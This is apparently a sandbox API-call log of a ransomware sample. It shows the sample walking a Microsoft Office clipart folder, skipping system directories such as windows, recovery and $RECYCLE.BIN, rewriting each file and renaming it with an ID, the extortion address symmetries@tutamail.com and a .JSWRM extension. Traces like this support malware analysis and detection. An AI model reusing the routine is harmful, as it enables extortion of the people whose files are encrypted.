lpWideCharStr="SO00610_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00610_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00610_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0096.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0096.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00610_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00610_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00610_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0096.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0096.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0096.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0096.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00610_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00610_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.431] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=40064) returned 1 [0096.431] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9c80) returned 0x24d210 [0096.431] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9c80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9c80, lpOverlapped=0x0) returned 1 [0096.476] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.476] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9c80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9c80, lpOverlapped=0x0) returned 1 [0096.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.477] CloseHandle (hObject=0x314) returned 1 [0096.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0096.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0096.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0096.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0096.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0096.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0096.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.478] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00610_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00610_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00610_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00610_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0096.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0096.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0096.479] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfe6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00629_.WMF", cAlternateFileName="")) returned 1 [0096.479] lstrcmpiW (lpString1="SO00629_.WMF", lpString2=".") returned 1 [0096.479] lstrcmpiW (lpString1="SO00629_.WMF", lpString2="..") returned 1 [0096.479] lstrcmpiW (lpString1="SO00629_.WMF", lpString2="...") returned 1 [0096.479] lstrcmpiW (lpString1="SO00629_.WMF", lpString2="windows") returned -1 [0096.479] lstrcmpiW (lpString1="SO00629_.WMF", lpString2="recovery") returned 1 [0096.479] lstrcmpiW (lpString1="SO00629_.WMF", lpString2="perflogs") returned 1 [0096.479] lstrcmpiW (lpString1="SO00629_.WMF", lpString2="documents and settings") returned 1 [0096.479] lstrcmpiW (lpString1="SO00629_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.479] lstrcmpiW (lpString1="SO00629_.WMF", lpString2="system volume information") returned -1 [0096.479] lstrcmpiW (lpString1="SO00629_.WMF", lpString2="msocache") returned 1 [0096.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0096.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00629_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00629_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00629_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0096.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00629_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00629_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00629_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0096.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0096.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0096.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00629_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00629_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.481] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4070) returned 1 [0096.481] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfe0) returned 0x23fc98 [0096.481] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xfe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xfe0, lpOverlapped=0x0) returned 1 [0096.483] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.483] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xfe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xfe0, lpOverlapped=0x0) returned 1 [0096.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0096.483] CloseHandle (hObject=0x314) returned 1 [0096.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0096.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0096.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0096.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0096.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0096.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0096.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.484] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00629_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00629_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00629_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00629_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0096.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0096.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0096.485] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5006, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00633_.WMF", cAlternateFileName="")) returned 1 [0096.485] lstrcmpiW (lpString1="SO00633_.WMF", lpString2=".") returned 1 [0096.485] lstrcmpiW (lpString1="SO00633_.WMF", lpString2="..") returned 1 [0096.485] lstrcmpiW (lpString1="SO00633_.WMF", lpString2="...") returned 1 [0096.485] lstrcmpiW (lpString1="SO00633_.WMF", lpString2="windows") returned -1 [0096.485] lstrcmpiW (lpString1="SO00633_.WMF", lpString2="recovery") returned 1 [0096.485] lstrcmpiW (lpString1="SO00633_.WMF", lpString2="perflogs") returned 1 [0096.485] lstrcmpiW (lpString1="SO00633_.WMF", lpString2="documents and settings") returned 1 [0096.485] lstrcmpiW (lpString1="SO00633_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.485] lstrcmpiW (lpString1="SO00633_.WMF", lpString2="system volume information") returned -1 [0096.485] lstrcmpiW (lpString1="SO00633_.WMF", lpString2="msocache") returned 1 [0096.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0096.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00633_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00633_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00633_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0096.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0096.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00633_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00633_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00633_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0096.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0096.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0096.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0096.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00633_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00633_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.486] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20486) returned 1 [0096.486] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5000) returned 0x24d210 [0096.487] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5000, lpOverlapped=0x0) returned 1 [0096.490] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.490] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5000, lpOverlapped=0x0) returned 1 [0096.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.490] CloseHandle (hObject=0x314) returned 1 [0096.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0096.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0096.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0096.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0096.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0096.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0096.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0096.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0096.491] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00633_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00633_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00633_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00633_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0096.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0096.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0096.502] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1aba, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00638_.WMF", cAlternateFileName="")) returned 1 [0096.502] lstrcmpiW (lpString1="SO00638_.WMF", lpString2=".") returned 1 [0096.502] lstrcmpiW (lpString1="SO00638_.WMF", lpString2="..") returned 1 [0096.502] lstrcmpiW (lpString1="SO00638_.WMF", lpString2="...") returned 1 [0096.502] lstrcmpiW (lpString1="SO00638_.WMF", lpString2="windows") returned -1 [0096.502] lstrcmpiW (lpString1="SO00638_.WMF", lpString2="recovery") returned 1 [0096.502] lstrcmpiW (lpString1="SO00638_.WMF", lpString2="perflogs") returned 1 [0096.502] lstrcmpiW (lpString1="SO00638_.WMF", lpString2="documents and settings") returned 1 [0096.503] lstrcmpiW (lpString1="SO00638_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.503] lstrcmpiW (lpString1="SO00638_.WMF", lpString2="system volume information") returned -1 [0096.503] lstrcmpiW (lpString1="SO00638_.WMF", lpString2="msocache") returned 1 [0096.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0096.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00638_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00638_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00638_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0096.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00638_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00638_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00638_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0096.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0096.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 